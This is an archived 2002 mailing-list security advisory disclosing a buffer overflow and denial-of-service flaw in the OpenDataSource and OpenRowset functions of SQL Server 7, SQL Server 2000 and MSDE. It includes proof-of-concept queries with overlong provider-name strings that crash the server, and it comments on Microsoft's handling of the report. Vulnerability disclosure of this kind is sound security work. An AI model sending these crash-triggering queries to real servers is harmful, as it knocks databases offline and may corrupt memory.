Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

MSDE, Sql Server 7 & 2000 Adhoc Heterogenous Queries Buffer Overflow and DOS.

From: c c <cesarc56 () yahoo com>
Date: Tue, 19 Feb 2002 07:55:06 -0800 (PST)
                                Security Advisory

Name :             MSDE, Sql Server 7 & 2000 Adhoc
Heterogenous Queries Buffer Overflow and DOS.
System Affected:   MSDE, Sql Server 7, Sql Server 2000
with all service packs and fixes applied.
Severity:                  High
Author:            Cesar Cerrudo.
Date:              19th February 2002   
Advisory Number:  CC020201


Description:

Distributed queries access data from multiple
heterogeneous data sources, which can be stored in
either 
the same or different computers. Microsoft  SQL Server
supports distributed queries by using OLE DB, 
the Microsoft specification of an application
programming interface (API) for universal data access.
Distributed queries provide SQL Server users with
access to: 
-Distributed data stored in multiple computers that
are running SQL Server. 
-Heterogeneous data stored in various relational and
non-relational data sources that can be accessed using

an OLE DB provider.

You can reference heterogeneous OLE DB data sources in
Transact-SQL statements by: 
-Linked servers , OpenQuery funtion.
-OpenDataSource and OpenRowset functions.

OpenDataSource and OpenRowset functions are accessible
to all users and contain an unchecked buffer in 
one of its parameters. The buffer overflow and DOS
problem ocurr when an overly long string is supplied
in 
the "provider name" parameter.

Details:

In Sql server 7 overflow starts at character number
6819 and if the amount 
of characteres is >= 6918 the server will crash :

SELECT * 
FROM OpenDataSource(
'XXXXXXXXXXX...' ---> 6819 characteres or more
,'')...nothing

SELECT * FROM OPENROWSET(
'XXXXXXXXXXX...' ---> 6819 characteres or more
,'',
'') 

In Sql server 2000 overflow starts at character number
6887 and if the amount 
of characteres is >= 6998 the server will crash :

SELECT * 
FROM OpenDataSource(
'XXXXXXXXXXX...' ---> 6887 characteres or more
,'')...nothing

SELECT * FROM OPENROWSET(
'XXXXXXXXXXX...' ---> 6887 characteres or more
,'',
'') 

Depend on de amount of characters some registry values
are overwriten.
Try with this examples and then take a look at the
dump file.

Patch Available: 
NONE

Workaround: 
Shutdown the servers.

Vendor Status :
Microsoft was contacted. When i contacted them i
explicitly told them that i would apply RFPolicy v2.
They asked me for the details and i gave it to them
and then they told me that they would contact me
again.
The first time they walk in the edge of the policy and
in the 5th day they contacted me again. Now i havent
been 
contacted by them in the last 8 days, so i disclose
the information. Maybe this is a new Microsoft's 
policy, to not 
contact the researcher in the proper time and not
expend time in writing a three words mail. 
One more thing Microsoft doesn't digitally sign the
mails from the Security Response Center when they
contact you, 
i think this is a vulnerability.

I discover another 3 or 4 security holes in sql server
with diverse severity, i will release them soon.

Dont blame me for this please, blame
MICROSOFT!!!!!!!!!.



__________________________________________________
Do You Yahoo!?
Yahoo! Sports - Coverage of the 2002 Olympic Games
http://sports.yahoo.com
Previous By Date Next
Previous By Thread Next

Current thread: